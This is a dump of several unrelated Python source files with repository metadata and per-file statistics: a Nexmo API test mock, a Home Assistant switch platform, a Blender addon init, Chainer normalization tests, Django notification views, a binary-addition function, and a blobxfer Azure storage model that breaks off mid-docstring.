print(values[0] * values[1] * values[2]) | 31.913043 | 71 | 0.61376 | 242 | 1,468 | 3.590909 | 0.210744 | 0.051784 | 0.041427 | 0.041427 | 0.227848 | 0.227848 | 0.195627 | 0.195627 | 0.165708 | 0.094361 | 0 | 0.019435 | 0.228883 | 1,468 | 46 | 72 | 31.913043 | 0.748233 | 0.162125 | 0 | 0.137931 | 0 | 0 | 0.119379 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.034483 | 0 | 0.034483 | 0.034483 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6818f1b4966a33a6d1d68e2fbd9d7dd04c95311a | 1,429 | py | Python | kinto_nexmo_verify/tests/__init__.py | Kinto/kinto-nexmo-verify | 6532ec9b5df20b338aca40d8ab3178ccf6ca33db | [
"Apache-2.0"
] | null | null | null | kinto_nexmo_verify/tests/__init__.py | Kinto/kinto-nexmo-verify | 6532ec9b5df20b338aca40d8ab3178ccf6ca33db | [
"Apache-2.0"
] | 142 | 2019-10-25T06:57:58.000Z | 2021-08-01T05:35:52.000Z | kinto_nexmo_verify/tests/__init__.py | Kinto/kinto-nexmo-verify | 6532ec9b5df20b338aca40d8ab3178ccf6ca33db | [
"Apache-2.0"
] | 1 | 2019-12-21T20:39:35.000Z | 2019-12-21T20:39:35.000Z | from unittest import mock
class AuthenticationMockMixin(object):
nexmo_verify_data = {
"request_id": "9e59abbe98204a9ebe8a36101383ec20",
"status": "0",
}
nexmo_cancel_data = {"status": "0", "command": "cancel"}
nexmo_check_data = {
"currency": "EUR",
"event_id": "0C000000F2319FC0",
"price": "0.10000000",
"request_id": "9e59abbe98204a9ebe8a36101383ec20",
"status": "0",
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._nexmo_patcher = mock.patch("kinto_nexmo_verify.views.requests")
def setUp(self):
super().setUp()
self.nexmo_mock = self._nexmo_patcher.start()
def tearDown(self):
super().tearDown()
self._nexmo_patcher.stop()
def mock_nexmo_verify_call(self, verify_data=None):
if verify_data is None:
verify_data = self.nexmo_verify_data
self.nexmo_mock.get.return_value.json.return_value = verify_data
def mock_nexmo_check_call(self, check_data=None):
if check_data is None:
check_data = self.nexmo_check_data
self.nexmo_mock.get.return_value.json.return_value = check_data
def mock_nexmo_cancel_call(self, cancel_data=None):
if cancel_data is None:
cancel_data = self.nexmo_cancel_data
self.nexmo_mock.get.return_value.json.return_value = cancel_data
| 31.065217 | 77 | 0.654304 | 171 | 1,429 | 5.105263 | 0.274854 | 0.103093 | 0.089347 | 0.058419 | 0.268041 | 0.158076 | 0.158076 | 0.158076 | 0.158076 | 0.158076 | 0 | 0.058447 | 0.23373 | 1,429 | 45 | 78 | 31.755556 | 0.738813 | 0 | 0 | 0.114286 | 0 | 0 | 0.140658 | 0.06788 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171429 | false | 0 | 0.028571 | 0 | 0.314286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a838e1b948e05c5be4d5a837ad910541049964e0 | 1,173 | py | Python | homeassistant/components/switch/elkm1.py | dauden1184/home-assistant | f4c6d389b77d0efa86644e76604eaea5d21abdb5 | [
"Apache-2.0"
] | 4 | 2019-01-10T14:47:54.000Z | 2021-04-22T02:06:27.000Z | homeassistant/components/switch/elkm1.py | dauden1184/home-assistant | f4c6d389b77d0efa86644e76604eaea5d21abdb5 | [
"Apache-2.0"
] | 6 | 2021-02-08T21:02:40.000Z | 2022-03-12T00:52:16.000Z | homeassistant/components/switch/elkm1.py | dauden1184/home-assistant | f4c6d389b77d0efa86644e76604eaea5d21abdb5 | [
"Apache-2.0"
] | 3 | 2018-08-29T19:26:20.000Z | 2020-01-19T11:58:22.000Z | """
Support for control of ElkM1 outputs (relays).
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/switch.elkm1/
"""
from homeassistant.components.elkm1 import (
DOMAIN as ELK_DOMAIN, ElkEntity, create_elk_entities)
from homeassistant.components.switch import SwitchDevice
DEPENDENCIES = [ELK_DOMAIN]
async def async_setup_platform(hass, config, async_add_entities,
discovery_info=None):
"""Create the Elk-M1 switch platform."""
if discovery_info is None:
return
elk = hass.data[ELK_DOMAIN]['elk']
entities = create_elk_entities(hass, elk.outputs, 'output', ElkOutput, [])
async_add_entities(entities, True)
class ElkOutput(ElkEntity, SwitchDevice):
"""Elk output as switch."""
@property
def is_on(self) -> bool:
"""Get the current output status."""
return self._element.output_on
async def async_turn_on(self, **kwargs):
"""Turn on the output."""
self._element.turn_on(0)
async def async_turn_off(self, **kwargs):
"""Turn off the output."""
self._element.turn_off()
| 28.609756 | 78 | 0.681159 | 148 | 1,173 | 5.222973 | 0.439189 | 0.034929 | 0.050453 | 0.043984 | 0.062096 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005388 | 0.208866 | 1,173 | 40 | 79 | 29.325 | 0.827586 | 0.192668 | 0 | 0 | 0 | 0 | 0.01074 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.105263 | 0 | 0.315789 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8390ab76fff1e3d90e5baeb2c77717ef34b9218 | 2,467 | py | Python | addons/blender-skeletal-motion-animate/__init__.py | trisadmeslek/V-Sekai-Blender-tools | 0d8747387c58584b50c69c61ba50a881319114f8 | [
"MIT"
] | null | null | null | addons/blender-skeletal-motion-animate/__init__.py | trisadmeslek/V-Sekai-Blender-tools | 0d8747387c58584b50c69c61ba50a881319114f8 | [
"MIT"
] | null | null | null | addons/blender-skeletal-motion-animate/__init__.py | trisadmeslek/V-Sekai-Blender-tools | 0d8747387c58584b50c69c61ba50a881319114f8 | [
"MIT"
] | null | null | null | # Important plugin info for Blender
bl_info = {
'name': 'Skeletal Pose Transfer for Blender',
'author': 'K. S. Ernest (iFire) Lee',
'category': 'Animation',
'location': 'View 3D > Tool Shelf > Skeletal Pose Transfer',
'description': 'Ttransfer skeletal pose animations',
'version': (1, 2, 1),
'blender': (2, 80, 0),
}
beta_branch = False
# If first startup of this plugin, load all modules normally
# If reloading the plugin, use importlib to reload modules
# This lets you do adjustments to the plugin on the fly without having to restart Blender
import sys
if "bpy" not in locals():
import bpy
from . import core
from . import panels
from . import operators
from . import properties
else:
import importlib
importlib.reload(core)
importlib.reload(panels)
importlib.reload(operators)
importlib.reload(properties)
classes_always_enable = [ # These non-panels will always be loaded, all non-panel ui should go in here
panels.retargeting.RetargetingPanel,
panels.info.InfoPanel,
operators.detector.DetectFaceShapes,
operators.detector.DetectActorBones,
operators.detector.SaveCustomBonesRetargeting,
operators.detector.ImportCustomBones,
operators.detector.ExportCustomBones,
operators.detector.ClearCustomBones,
operators.detector.ClearCustomShapes,
operators.actor.InitTPose,
operators.actor.ResetTPose,
operators.actor.PrintCurrentPose,
operators.retargeting.RenameVRMBones,
operators.retargeting.RenameVRMBonesStandard,
operators.retargeting.BuildBoneList,
operators.retargeting.ClearBoneList,
operators.retargeting.RetargetAnimation,
panels.retargeting.RSL_UL_BoneList,
panels.retargeting.BoneListItem,
operators.info.LicenseButton,
]
# register and unregister all classes
def register():
# Register classes
for cls in classes_always_enable:
bpy.utils.register_class(cls)
# Register all custom properties
properties.register()
# Load custom icons
core.icon_manager.load_icons()
# Load bone detection list
core.detection_manager.load_detection_lists()
def unregister():
# Unregister all classes
for cls in reversed(classes_always_enable):
try:
bpy.utils.unregister_class(cls)
except RuntimeError:
pass
# Unload all custom icons
core.icon_manager.unload_icons()
if __name__ == '__main__':
register()
| 28.686047 | 103 | 0.72274 | 274 | 2,467 | 6.408759 | 0.474453 | 0.067768 | 0.03246 | 0.017084 | 0.029613 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004034 | 0.19619 | 2,467 | 85 | 104 | 29.023529 | 0.881493 | 0.197 | 0 | 0 | 0 | 0 | 0.105691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0.016667 | 0.2 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a839d82c096389366f2dfe418b713be6aa4af0af | 7,278 | py | Python | tests/chainer_tests/functions_tests/normalization_tests/test_l2_normalization.py | dydo0316/test2 | a9982a8b426dd07eb1ec4e7695a7bc546ecc6063 | [
"MIT"
] | null | null | null | tests/chainer_tests/functions_tests/normalization_tests/test_l2_normalization.py | dydo0316/test2 | a9982a8b426dd07eb1ec4e7695a7bc546ecc6063 | [
"MIT"
] | 2 | 2018-01-09T23:05:30.000Z | 2018-01-19T01:19:34.000Z | tests/chainer_tests/functions_tests/normalization_tests/test_l2_normalization.py | dydo0316/test2 | a9982a8b426dd07eb1ec4e7695a7bc546ecc6063 | [
"MIT"
] | null | null | null | import functools
import unittest
import itertools
import numpy
import six
import chainer
from chainer.backends import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
def _skip_if(cond, reason):
"""Skip test if cond(self) is True"""
def decorator(impl):
@functools.wraps(impl)
def wrapper(self, *args, **kwargs):
if cond(self):
raise unittest.SkipTest(reason)
else:
impl(self, *args, **kwargs)
return wrapper
return decorator
def _is_good_param(param):
# Check if 'nonzero' param is valid and meaningful. On the latter point,
# x should contain at least a zero if 'nonzeros' param is given.
return param['nonzeros'] is None \
or param['nonzeros'] < numpy.prod(param['shape'])
@testing.parameterize(*filter(_is_good_param, testing.product([
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64},
],
[
{'shape': (4, 15), 'axis': 1},
{'shape': (4,), 'axis': 0},
{'shape': (4, 3, 2, 5), 'axis': 0},
{'shape': (4, 3, 2, 5), 'axis': 1},
{'shape': (4, 3, 2, 5), 'axis': 2},
{'shape': (4, 3, 2, 5), 'axis': 3},
{'shape': (4, 3, 2), 'axis': (0, 1)},
{'shape': (4, 3, 2, 4, 3, 2, 2), 'axis': (1, 4, 3, 6)},
{'shape': (0, 2), 'axis': 1},
{'shape': (), 'axis': ()},
],
[
# nonzeros (optional int): number of nonzero elems in input
# truezero (bool): flag whether zero elems are exactly zero. If false,
# randomly-chosen small values are used.
{'eps': 1e-5, 'nonzeros': None},
{'eps': 1e-1, 'nonzeros': None},
{'eps': 1e-1, 'nonzeros': 0, 'truezero': True},
{'eps': 1e-1, 'nonzeros': 0, 'truezero': False},
{'eps': 1e-1, 'nonzeros': 2, 'truezero': True},
{'eps': 1e-1, 'nonzeros': 2, 'truezero': False},
],
])))
class TestL2Normalization(unittest.TestCase):
def setUp(self):
self.x = chainer.utils.force_array(
numpy.random.uniform(0.1, 1, self.shape)
* (1 - 2 * numpy.random.randint(2, size=self.shape)),
self.dtype)
if self.nonzeros is not None:
# Make self.x have limited number of large values
# get mask of indices to modify at
zeros = self.x.size - self.nonzeros
while True:
rand = numpy.random.uniform(0, 1, self.shape)
mask = rand <= numpy.sort(rand.ravel())[zeros - 1]
if self.x[mask].shape == (zeros,):
break
# set zeros or small values to a part of the input
if self.truezero:
self.x[mask] = 0
else:
zero_scale = 10. ** numpy.random.randint(-40, -3)
self.x[mask] = numpy.random.uniform(
-zero_scale, zero_scale, zeros)
self.gy = numpy.random.uniform(-1, 1, self.shape).astype(self.dtype)
self.ggx = numpy.random.uniform(
-1, 1, self.shape).astype(self.dtype)
if self.dtype == numpy.float16:
self.check_forward_options = {'atol': 1e-3, 'rtol': 1e-3}
else:
self.check_forward_options = {}
if self.nonzeros is None:
if self.dtype == numpy.float16:
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 5e-3, 'rtol': 5e-3}
self.check_double_backward_options = {
'dtype': numpy.float64, 'atol': 1e-2, 'rtol': 1e-2}
else:
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 1e-4, 'rtol': 1e-4}
self.check_double_backward_options = {
'dtype': numpy.float64, 'atol': 1e-4, 'rtol': 1e-4}
else:
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 1e-2, 'rtol': 1e-2,
'eps': 1e-4}
self.check_backward_options = {
'dtype': numpy.float64, 'atol': 1e-2, 'rtol': 1e-2,
'eps': 1e-4}
def check_forward(self, x_data, axis):
eps = self.eps
x = chainer.Variable(x_data)
y = functions.normalize(x, eps=eps, axis=axis)
self.assertEqual(y.data.dtype, self.dtype)
y_data = cuda.to_cpu(y.data)
y_expect = numpy.empty_like(self.x)
shape = self.x.shape
indices = []
axis_tuple = axis if isinstance(axis, tuple) else (axis,)
for i in six.moves.range(len(shape)):
if i not in axis_tuple:
indices.append(six.moves.range(shape[i]))
else:
indices.append([slice(None)])
indices_tuple = list(itertools.product(*indices))
for index in indices_tuple:
# Note: Casting back the result of `numpy.linalg.norm` to `x.dtype`
# because old NumPy casts it to float32 when a float16 value is
# given.
numerator = numpy.linalg.norm(self.x[index]).astype(x.dtype) + eps
y_expect[index] = self.x[index] / numerator
testing.assert_allclose(y_expect, y_data, **self.check_forward_options)
def test_forward_cpu(self):
self.check_forward(self.x, self.axis)
@attr.gpu
def test_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.x), self.axis)
def check_backward(self, x_data, axis, y_grad):
def f(x):
return functions.normalize(x, eps=self.eps, axis=axis)
gradient_check.check_backward(
f, x_data, y_grad, **self.check_backward_options)
def test_backward_cpu(self):
self.check_backward(self.x, self.axis, self.gy)
@attr.gpu
def test_backward_gpu(self):
self.check_backward(
cuda.to_gpu(self.x), self.axis, cuda.to_gpu(self.gy))
@_skip_if(
lambda self: self.nonzeros is not None,
'backward of L2Normalize is non-differentiable at zero vector')
def check_double_backward(self, x_data, axis, y_grad, x_grad_grad):
def f(x):
return functions.normalize(x, eps=self.eps, axis=axis)
gradient_check.check_double_backward(
f, x_data, y_grad, x_grad_grad,
**self.check_double_backward_options)
def test_double_backward_cpu(self):
self.check_double_backward(self.x, self.axis, self.gy, self.ggx)
@attr.gpu
def test_double_backward_gpu(self):
self.check_double_backward(
cuda.to_gpu(self.x), self.axis, cuda.to_gpu(self.gy),
cuda.to_gpu(self.ggx))
def check_eps(self, x_data):
x = chainer.Variable(x_data)
y = functions.normalize(x, axis=self.axis)
self.assertEqual(y.data.dtype, self.dtype)
y_data = cuda.to_cpu(y.data)
y_expect = numpy.zeros_like(self.x)
testing.assert_allclose(y_expect, y_data)
def test_eps_cpu(self):
self.check_eps(numpy.zeros_like(self.x))
@attr.gpu
def test_eps_gpu(self):
self.check_eps(cuda.to_gpu(numpy.zeros_like(self.x)))
testing.run_module(__name__, __file__)
| 35.330097 | 79 | 0.570212 | 963 | 7,278 | 4.173416 | 0.190031 | 0.028614 | 0.025877 | 0.011943 | 0.41677 | 0.348594 | 0.290371 | 0.22941 | 0.210251 | 0.189848 | 0 | 0.027253 | 0.294174 | 7,278 | 205 | 80 | 35.502439 | 0.75511 | 0.082578 | 0 | 0.23125 | 0 | 0 | 0.056448 | 0 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.11875 | false | 0 | 0.06875 | 0.01875 | 0.225 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83be5082f23ba079872c2b2be55b119af1a7aaf | 956 | py | Python | test/test_pipeline/components/classification/test_xgradient_boosting.py | tuggeluk/auto-sklearn | 202918e5641701c696b995039d06bfec81973cc6 | [
"BSD-3-Clause"
] | null | null | null | test/test_pipeline/components/classification/test_xgradient_boosting.py | tuggeluk/auto-sklearn | 202918e5641701c696b995039d06bfec81973cc6 | [
"BSD-3-Clause"
] | null | null | null | test/test_pipeline/components/classification/test_xgradient_boosting.py | tuggeluk/auto-sklearn | 202918e5641701c696b995039d06bfec81973cc6 | [
"BSD-3-Clause"
] | null | null | null | import autosklearn.pipeline.implementations.xgb
from autosklearn.pipeline.components.classification.xgradient_boosting import \
XGradientBoostingClassifier
from .test_base import BaseClassificationComponentTest
class XGradientBoostingComponentTest(BaseClassificationComponentTest):
__test__ = True
res = dict()
res["default_iris"] = 0.94
res["iris_n_calls"] = 6
res["default_iris_iterative"] = 0.94
res["default_iris_proba"] = 0.1512353178486228
res["default_iris_sparse"] = 0.74
res["default_digits"] = 0.8160291438979964
res["digits_n_calls"] = 7
res["default_digits_iterative"] = 0.8160291438979964
res["default_digits_binary"] = 0.9823922282938676
res["default_digits_multilabel"] = 0.88
res["default_digits_multilabel_proba"] = 0.88
res['ignore_hps'] = ['n_estimators']
sk_mod = autosklearn.pipeline.implementations.xgb.CustomXGBClassifier
module = XGradientBoostingClassifier
| 34.142857 | 79 | 0.759414 | 103 | 956 | 6.757282 | 0.436893 | 0.12931 | 0.114943 | 0.106322 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103532 | 0.141213 | 956 | 27 | 80 | 35.407407 | 0.744214 | 0 | 0 | 0 | 0 | 0 | 0.24477 | 0.128661 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83cb39550575518f70701df5178e9726847ad82 | 2,267 | py | Python | coursereg/views/notifications.py | s-gv/bheemboy | b35c6611739b6df517cb1bb642fa6d46cf1b246e | [
"MIT"
] | null | null | null | coursereg/views/notifications.py | s-gv/bheemboy | b35c6611739b6df517cb1bb642fa6d46cf1b246e | [
"MIT"
] | 105 | 2016-05-07T05:54:28.000Z | 2016-12-30T13:47:13.000Z | coursereg/views/notifications.py | s-gv/bheemboy | b35c6611739b6df517cb1bb642fa6d46cf1b246e | [
"MIT"
] | 4 | 2016-05-29T14:00:33.000Z | 2020-09-30T17:16:02.000Z | from django.shortcuts import render, redirect
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.contrib.auth.decorators import login_required
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from datetime import timedelta
from coursereg import models
from django.core.mail import send_mail
from django.core.exceptions import PermissionDenied
from django.views.decorators.http import require_POST
@require_POST
@login_required
def dismiss(request):
user = models.User.objects.get(id=request.POST['id'])
if not user: raise PermissionDenied
if request.user.user_type == models.User.USER_TYPE_STUDENT:
if not user == request.user: raise PermissionDenied
models.Notification.objects.filter(user=user).update(is_student_acknowledged=True)
if request.user.user_type == models.User.USER_TYPE_DCC:
if not user.department == request.user.department: raise PermissionDenied
models.Notification.objects.filter(user=user).update(is_dcc_acknowledged=True)
elif request.user.user_type == models.User.USER_TYPE_FACULTY:
if not user.adviser == request.user: raise PermissionDenied
models.Notification.objects.filter(user=user).update(is_adviser_acknowledged=True)
return redirect(request.POST.get('next', reverse('coursereg:index')))
@require_POST
@login_required
def notify(request):
if not request.user.user_type == models.User.USER_TYPE_DCC:
raise PermissionDenied
user = models.User.objects.get(id=request.POST['id'])
if not user or user.department != request.user.department:
raise PermissionDenied
user.is_dcc_review_pending = True
user.is_dcc_sent_notification = True
user.save()
models.Notification.objects.create(
user=user,
origin=models.Notification.ORIGIN_DCC,
message=request.POST['message'],
)
try:
send_mail('Coursereg notification', request.POST['message'], settings.DEFAULT_FROM_EMAIL, [user.email, user.adviser.email])
except:
messages.warning(request, 'Error sending e-mail. But a notification has been created on this website.')
return redirect(request.POST.get('next', reverse('coursereg:index')))
| 45.34 | 131 | 0.758271 | 296 | 2,267 | 5.689189 | 0.277027 | 0.057007 | 0.057007 | 0.045131 | 0.434086 | 0.402019 | 0.402019 | 0.347981 | 0.32601 | 0.191211 | 0 | 0 | 0.146008 | 2,267 | 49 | 132 | 46.265306 | 0.869835 | 0 | 0 | 0.212766 | 0 | 0 | 0.067049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.234043 | 0 | 0.319149 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83e03a5805d48d1783c453a34cd624c971c7012 | 484 | py | Python | LeetCode/add_binary.py | milkrong/Basic-Python-DS-Algs | e3accd22d8cf25546f33883aac634a9bfe108b34 | [
"MIT"
] | null | null | null | LeetCode/add_binary.py | milkrong/Basic-Python-DS-Algs | e3accd22d8cf25546f33883aac634a9bfe108b34 | [
"MIT"
] | null | null | null | LeetCode/add_binary.py | milkrong/Basic-Python-DS-Algs | e3accd22d8cf25546f33883aac634a9bfe108b34 | [
"MIT"
] | null | null | null | def add_binary(a, b):
'''
:param a: str
:param b: str
:return: str
'''
result = ''
index = 0
carry = '0'
while index < max(len(a), len(b)) or carry == '1':
num_a = a[-1 - index] if index < len(a) else '0'
num_b = b[-1 - index] if index < len(b) else '0'
val = int(num_a) + int(num_b) + int(carry)
result = "%s%s" % (val % 2, result)
carry = '1' if val > 1 else '0'
index += 1
return result
| 20.166667 | 56 | 0.464876 | 76 | 484 | 2.894737 | 0.315789 | 0.068182 | 0.072727 | 0.118182 | 0.145455 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038961 | 0.363636 | 484 | 23 | 57 | 21.043478 | 0.675325 | 0.082645 | 0 | 0 | 0 | 0 | 0.023923 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a83ef76f0db9af649a83f2eb68ffddc1dd292b97 | 15,732 | py | Python | blobxfer/models/azure.py | amishra-dev/blobxfer | ce226392f0ede609a0a82d7b9c0e3a959e1e089f | [
"MIT"
] | 147 | 2016-07-27T06:24:38.000Z | 2022-03-12T05:43:30.000Z | blobxfer/models/azure.py | amishra-dev/blobxfer | ce226392f0ede609a0a82d7b9c0e3a959e1e089f | [
"MIT"
] | 127 | 2016-09-01T08:06:51.000Z | 2022-02-18T02:52:42.000Z | blobxfer/models/azure.py | amishra-dev/blobxfer | ce226392f0ede609a0a82d7b9c0e3a959e1e089f | [
"MIT"
] | 47 | 2016-07-25T16:19:01.000Z | 2022-01-25T17:59:49.000Z | # Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# stdlib imports
import enum
import pathlib
# non-stdlib imports
from azure.storage.blob.models import _BlobTypes as BlobTypes
# local imports
import blobxfer.models.metadata
import blobxfer.util
# enums
class StorageModes(enum.Enum):
Auto = 10
Append = 20
Block = 30
File = 40
Page = 50
class StorageEntity(object):
"""Azure Storage Entity"""
def __init__(self, container, ed=None):
# type: (StorageEntity, str
# blobxfer.models.crypto.EncryptionMetadata) -> None
"""Ctor for StorageEntity
:param StorageEntity self: this
:param str container: container name
:param blobxfer.models.crypto.EncryptionMetadata ed:
encryption metadata
"""
self._can_create_containers = None
self._client = None
self._container = container
self._name = None
self._mode = None
self._lmt = None
self._size = None
self._snapshot = None
self._md5 = None
self._cache_control = None
self._encryption = ed
self._from_local = False
self._append_create = True
self._vio = None
self._fileattr = None
self._raw_metadata = None
self._access_tier = None
self._content_type = None
self._is_arbitrary_url = False
self.replica_targets = None
@property
def can_create_containers(self):
# type: (StorageEntity) -> bool
"""Create containers
:param StorageEntity self: this
:rtype: bool
:return: create containers
"""
return self._can_create_containers
@property
def client(self):
# type: (StorageEntity) -> object
"""Associated storage client
:param StorageEntity self: this
:rtype: object
:return: associated storage client
"""
return self._client
@property
def container(self):
# type: (StorageEntity) -> str
"""Container name
:param StorageEntity self: this
:rtype: str
:return: name of container or file share
"""
return self._container
@property
def name(self):
# type: (StorageEntity) -> str
"""Entity name
:param StorageEntity self: this
:rtype: str
:return: name of entity
"""
return self._name
@property
def path(self):
# type: (StorageEntity) -> str
"""Entity path
:param StorageEntity self: this
:rtype: str
:return: remote path of entity
"""
if self._is_arbitrary_url:
return self._name
else:
return '{}/{}'.format(self._container, self._name)
@property
def lmt(self):
# type: (StorageEntity) -> datetime.datetime
"""Entity last modified time
:param StorageEntity self: this
:rtype: datetime.datetime
:return: LMT of entity
"""
return self._lmt
@property
def size(self):
# type: (StorageEntity) -> int
"""Entity size
:param StorageEntity self: this
:rtype: int
:return: size of entity
"""
return self._size
@size.setter
def size(self, value):
# type: (StorageEntity, int) -> None
"""Set entity size
:param StorageEntity self: this
:param int value: value
"""
self._size = value
@property
def snapshot(self):
# type: (StorageEntity) -> str
"""Entity snapshot
:param StorageEntity self: this
:rtype: str
:return: snapshot of entity
"""
return self._snapshot
@property
def cache_control(self):
# type: (StorageEntity) -> str
"""Cache control
:param StorageEntity self: this
:rtype: str
:return: cache control of entity
"""
return self._cache_control
@cache_control.setter
def cache_control(self, value):
# type: (StorageEntity, str) -> None
"""Set cache control
:param StorageEntity self: this
:param str value: value
"""
self._cache_control = value
@property
def md5(self):
# type: (StorageEntity) -> str
"""Base64-encoded MD5
:param StorageEntity self: this
:rtype: str
:return: md5 of entity
"""
return self._md5
@property
def mode(self):
# type: (StorageEntity) -> blobxfer.models.azure.StorageModes
"""Entity mode (type)
:param StorageEntity self: this
:rtype: blobxfer.models.azure.StorageModes
:return: type of entity
"""
return self._mode
@property
def from_local(self):
# type: (StorageEntity) -> bool
"""If entity was created from a local file (no remote exists)
:param StorageEntity self: this
:rtype: bool
:return: if entity is from local (no remote exists)
"""
return self._from_local
@property
def append_create(self):
# type: (StorageEntity) -> bool
"""If append blob should be created
:param StorageEntity self: this
:rtype: bool
:return: if append blob should be created
"""
return self._append_create
@append_create.setter
def append_create(self, value):
# type: (StorageEntity, bool) -> None
"""Set append create option
:param StorageEntity self: this
:param bool value: value to set
"""
self._append_create = value
@property
def is_encrypted(self):
# type: (StorageEntity) -> bool
"""If data is encrypted
:param StorageEntity self: this
:rtype: bool
:return: if encryption metadata is present
"""
return self._encryption is not None
@property
def encryption_metadata(self):
# type: (StorageEntity) ->
# blobxfer.models.crypto.EncryptionMetadata
"""Get encryption metadata
:param StorageEntity self: this
:rtype: blobxfer.models.crypto.EncryptionMetadata
:return: encryption metadata of entity
"""
return self._encryption
@encryption_metadata.setter
def encryption_metadata(self, value):
# type: (StorageEntity,
# blobxfer.models.crypto.EncryptionMetadata) -> None
"""Set encryption metadata
:param StorageEntity self: this
:param blobxfer.models.crypto.EncryptionMetadata value: value
"""
self._encryption = value
@property
def file_attributes(self):
# type: (StorageEntity) -> object
"""Return file attributes collection
:param StorageEntity self: this
:rtype: blobxfer.models.metadata.PosixFileAttr or
blobxfer.models.metadata.WindowsFileAttr or None
:return: file attributes
"""
return self._fileattr
@property
def vectored_io(self):
# type: (StorageEntity) -> object
"""Return vectored io metadata, currently stripe only
:param StorageEntity self: this
:rtype: blobxfer.models.metadata.VectoredStripe or None
:return: vectored io metadata
"""
return self._vio
@property
def raw_metadata(self):
# type: (StorageEntity) -> dict
"""Return raw metadata for synccopy sources
:param StorageEntity self: this
:rtype: dict
:return: raw metadata
"""
return self._raw_metadata
@property
def access_tier(self):
# type: (StorageEntity) -> str
"""Return access tier for blob
:param StorageEntity self: this
